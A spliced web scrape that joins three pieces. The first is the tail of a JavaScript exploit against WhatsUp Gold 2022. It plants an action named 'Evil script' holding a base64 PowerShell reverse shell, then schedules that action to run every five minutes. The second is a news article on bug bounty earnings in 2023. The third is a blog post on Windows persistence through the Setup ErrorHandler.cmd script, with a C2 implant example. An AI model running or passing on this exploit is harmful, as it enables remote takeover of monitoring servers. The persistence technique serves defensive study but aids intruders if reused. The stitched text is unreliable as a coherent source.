BbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}'});setTimeout(() => { getactions(); }, 1000);};async function getactions() {const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{    method: 'GET',    headers: {        'Connection': 'close',         'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',         'Accept': 'application/json',         'Content-Type': 'application/json',         'X-Requested-With': 'XMLHttpRequest',         'sec-ch-ua-mobile': '?0',         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',         'sec-ch-ua-platform': '"macOS"',         'Sec-Fetch-Site': 'same-origin',         'Sec-Fetch-Mode': 'cors',         'Sec-Fetch-Dest': 'empty',         'Accept-Encoding': 'gzip, deflate',         'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include'   });const actions = await response.json();var results = [];var searchField = "Name";var searchVal = "Systemtask";for (var i=0 ; i < actions.length ; i++){    if (actions[i][searchField] == searchVal) {        results.push(actions[i].Id);        revshell(results[0])           }}//console.log(actions);};async function revshell(ID) {fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '2442',        'Cache-Control': 'max-age=0',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'sec-ch-ua-mobile': '?0',        'sec-ch-ua-platform': '"macOS"',        'Upgrade-Insecure-Requests': '1',        'Origin': 'https://192.168.16.100',        'Content-Type': 'application/x-www-form-urlencoded',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',        'Sec-Fetch-Site': 'same-origin',        'Sec-Fetch-Mode': 'navigate',        'Sec-Fetch-User': '?1',        'Sec-Fetch-Dest': 'iframe',        'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0'});};

WhatsUp Gold 2022 22.1.0 Build 39 Cross Site Scripting

By Deeba Ahmed
The US Department of Defense reported the most security vulnerabilities in 2023, with 96 reports or 10% of all reports.
This is a post from HackRead.com Read the original post: Ethical Hackers Reported 835 Vulnerabilities, Earned $450K in 2023

In 2023, HackerOne’s bug bounty data, acquired by Surfshark, a VPN service provider, reveals the crucial role of ethical hackers in safeguarding top government organizations like the US Department of Defense and private companies such as LinkedIn.

A study by Surfshark, a VPN service provider, has revealed that ethical hackers, or white hat hackers, played a vital role in improving cybersecurity in 2023 by identifying 835 vulnerabilities across 105 websites. Their efforts not only secured these platforms but also generated €417,000 ($450,000) in earnings through bug bounty programs. 

The study is based on HackerOne bug bounty program data, which connects security researchers with organizations to detect/disclose vulnerabilities. The HackerOne repository collected data on security vulnerability reports in 2023, aggregating it by company, type of vulnerability, and bounty size. The data was acquired by Surfshark in January 2024.

According to the report, in 2023, 835 vulnerability reports were submitted by 93 ethical hackers, with 96 cases reported in the HackerOne repository. The US Department of Defense reported the most security vulnerabilities in 2023, with 96 reports or 10% of all reports. Two server issues were attributed to website misconfigurations. The flaws allowed users to alter privileges, upload files, and remove accounts.

LinkedIn has received 28 security vulnerability reports, ranking fifth most frequently reported platform. Two critical cases involved improper information disclosure, and a major data breach in 2023 involving the exposure of 500 million users’ personal information.

Surfshark’s research team head, Agneska Sablovskaja, emphasizes the importance of “partnerships between companies and ethical hackers” to address software vulnerabilities, as complex platforms “with millions of lines of codes” may leave flaws behind.

The study highlights the growing importance of ethical hacking as a tool for enhancing online security. Surfshark’s Cyber Security Lead Aleksandr Valentij urges users to download software updates, as vulnerabilities become more dangerous once public.

Cyberattacks are becoming more sophisticated, necessitating collaboration between organizations and ethical hackers. As bug bounty programs expand, more vulnerabilities will be discovered, promoting a safer online environment.

****RELATED ARTICLES****

1.  **White Hat Hacker at DefCon Jaikbreaks Tractor to Play Doom**
2.  **Google Introduces Bug Bounty Program for Open-Source Software**
3.  **Pwn2Own 2023: Tesla Model 3, Windows 11, Ubuntu & more Pwned**
4.  **Hack the Pentagon 3.0: Groundbreaking Bug Bounty Program Is Back**
5.  **Crypto Industry Lost $685 Million in Q3 2023, 30% by Lazarus Group**

Ethical Hackers Reported 835 Vulnerabilities, Earned $450K in 2023

When the Windows Operating system is installed via a clean installation or via an upgrade, the Windows Setup binary is executed. The Windows setup allows… 
Continue reading → Persistence – Windows Setup Script

Skip to content

When the Windows Operating system is installed via a clean installation or via an upgrade, the Windows Setup binary is executed. The Windows setup allows custom scripts to be executed such as the _SetupComplete.cmd_ and _ErrorHandler.cmd_ to enable the installation of applications or the execution of other tasks during or after the Windows setup process is completed. These scripts are stored in the following location:

    %WINDIR%\Setup\Scripts\SetupComplete.cmd
    %WINDIR%\Setup\Scripts\ErrorHandler.cmd

Using the _ErrorHandler.cmd_ script it is possible to execute arbitrary code when the Windows operating system is upgraded. Even though it could be considered as an unconventional tactic, it could be combined with scheduled tasks for example to run Windows Setup and establish persistence. The following code can be used as a proof of concept of code execution that will display a message box when the Windows Setup binary is initiated:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Windows\_setup1
{
    internal static class Program
    {
        \[STAThread\]
        static void Main()
        {
            string message = "Visit pentestlab.blog";
            string title = "Pentestlaboratories";
            MessageBox.Show(message, title);
        }
    }
}

Windows Setup Script – Message Box Code

Since the Windows Setup will look during execution and when an error is caused in the setup process for the presence of _ErrorHandler.cmd_ inside the _Scripts_ folder, it is possible to use this script to execute arbitrary code.

Windows Setup Script Path

Running the _setup.exe_ will cause an error which as a result will force the execution of _ErrorHandler.cmd_ script.

Windows Setup Script – Message Box

Replacing the message box executable with an implant will allow a command and control session to be established.

Windows Setup Script – C2

The process tree of the implant is specified below:

    Setup.exe --> cmd.exe --> demon.x64.exe

Windows Setup Script – Process Tree

**References**

1.  https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/
2.  https://cocomelonc.github.io/persistence/2023/07/16/malware-pers-22.html

**Post navigation**

Tag

#windows